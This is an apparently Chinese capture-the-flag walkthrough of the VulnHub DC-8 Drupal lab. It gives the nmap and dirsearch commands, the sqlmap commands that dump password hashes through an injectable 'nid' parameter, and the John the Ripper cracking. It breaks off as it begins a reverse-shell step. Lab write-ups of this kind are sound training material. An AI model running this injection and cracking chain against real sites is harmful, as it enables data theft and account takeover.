靶机地址:https://www.vulnhub.com/entry/dc-8,367/
目标:get root and to read the one and only flag
一、主机扫描
nmap -sP 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
发现目标IP:192.168.11.138
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
192.168.11.1
192.168.11.138
192.168.11.254
192.168.11.128
二、端口扫描
nmap -A -Pn -p0-65535 192.168.11.138
┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p1-65535 192.168.11.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-10 13:52 CST
Nmap scan report for 192.168.11.138
Host is up (0.0042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
| 256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_ 256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
MAC Address: 00:0C:29:70:FE:93 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 4.22 ms 192.168.11.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
扫描发现存在22端口ssh远程连接和80端口的web服务。
三、目录扫描
dirsearch -u 192.168.11.138 -e * -x 403
-u 指定您的目标
-e 指定脚本类型
-x 指定排除的状态码
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.138 -e * -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: 公共 | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/192.168.11.138_23-03-10_14-08-18.txt
Error Log: /root/.dirsearch/logs/errors-23-03-10_14-08-18.log
Target: http://192.168.11.138/
[14:08:18] Starting:
[14:08:20] 200 - 8KB - /0
[14:08:22] 200 - 111KB - /CHANGELOG.txt
[14:08:22] 200 - 1KB - /COPYRIGHT.txt
[14:08:22] 200 - 2KB - /INSTALL.mysql.txt
[14:08:22] 200 - 18KB - /INSTALL.txt
[14:08:22] 200 - 2KB - /INSTALL.pgsql.txt
[14:08:22] 200 - 18KB - /LICENSE.txt
[14:08:23] 200 - 8KB - /MAINTAINERS.txt
[14:08:23] 200 - 5KB - /README.txt
[14:08:24] 200 - 10KB - /UPGRADE.txt
[14:08:49] 301 - 239B - /includes -> http://192.168.11.138/includes/
[14:08:49] 200 - 8KB - /index.php
[14:08:49] 200 - 3KB - /install.php
[14:08:54] 301 - 235B - /misc -> http://192.168.11.138/misc/
[14:08:54] 301 - 238B - /modules -> http://192.168.11.138/modules/
[14:08:55] 200 - 7KB - /node
[14:09:00] 301 - 239B - /profiles -> http://192.168.11.138/profiles/
[14:09:01] 200 - 2KB - /robots.txt
[14:09:02] 301 - 238B - /scripts -> http://192.168.11.138/scripts/
[14:09:06] 301 - 236B - /sites -> http://192.168.11.138/sites/
[14:09:06] 200 - 904B - /sites/README.txt
[14:09:06] 200 - 0B - /sites/example.sites.php
[14:09:06] 200 - 1020B - /sites/all/themes/README.txt
[14:09:06] 200 - 1KB - /sites/all/modules/README.txt
[14:09:06] 200 - 151B - /sites/all/libraries/README.txt
[14:09:13] 301 - 237B - /themes -> http://192.168.11.138/themes/
[14:09:17] 200 - 8KB - /user
[14:09:17] 200 - 8KB - /user/
[14:09:17] 200 - 8KB - /user/login/
[14:09:20] 200 - 2KB - /web.config
[14:09:24] 200 - 42B - /xmlrpc.php
Task Completed
-
CHANGELOG.txt:框架更新日志
-
/user/login/:后台登录界面
-
其它的基本没鸟用
四、页面探测
注:Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。
扫描发现使用的是由PHP开发的Drupal框架。
访问前面扫描的COPYRIGHT.txt目录,发现框架漏洞基本都已经被修复,总不能看源码去做白盒代码审计吧?!!!
探索发现URL参数nid非常可疑,可能存在有SQL注入、XSS等漏洞
http://192.168.11.138/?nid=1
五、SQL注入
在nid参数后面加'出现了SQL报错。
上SQLmap一把梭
1、爆数据库
sqlmap -u "http://192.168.11.138/?nid=1" --dbs --batch
available databases [2]:
[*] d7db
[*] information_schema
2、爆表
sqlmap -u "http://192.168.11.138/?nid=1" -D d7db --tables --batch
Database: d7db
[88 tables]
+-----------------------------+
| filter |
| system |
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
3、爆字段名
有一堆表,但是有用的只有users表
sqlmap -u "http://192.168.11.138/?nid=1" -D d7db -T users --columns --batch
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| language | varchar(12) |
| access | int(11) |
| created | int(11) |
| data | longblob |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| name | varchar(60) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| status | tinyint(4) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
4、爆字段
sqlmap -u "http://192.168.11.138/?nid=1" -D d7db -T users -C uid,name,pass --dump --batch
Database: d7db
Table: users
[3 entries]
+-----+---------+---------------------------------------------------------+
| uid | name | pass |
+-----+---------+---------------------------------------------------------+
| 0 | <blank> | <blank> |
| 1 | admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2 | john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+---------------------------------------------------------+
5、保存字段
得到了两个用户,还有加盐的hash密文,将两个密文分别保存。
六、爆破密文
Drupal的hash密文是经过特殊加密的,用john进行爆破。
john admin
john john
使用-show参数查看已破解密文
┌──(root㉿kali)-[~] └─# john -show admin 0 password hashes cracked, 1 left
┌──(root㉿kali)-[~] └─# john -show john ?:turtle
1 password hash cracked, 0 left
admin没有爆出来,只爆破出了john用户的密码为turtle
七、反弹SHELL
目录扫描时发现/user/login/后台登录界面,使用john用户登录。
探索发现在Webform处可以编辑并执行PHP代码,kali启动监听
直接写入反弹SHELL(依次点击Contact Us --> Webform --> Form settings)
注: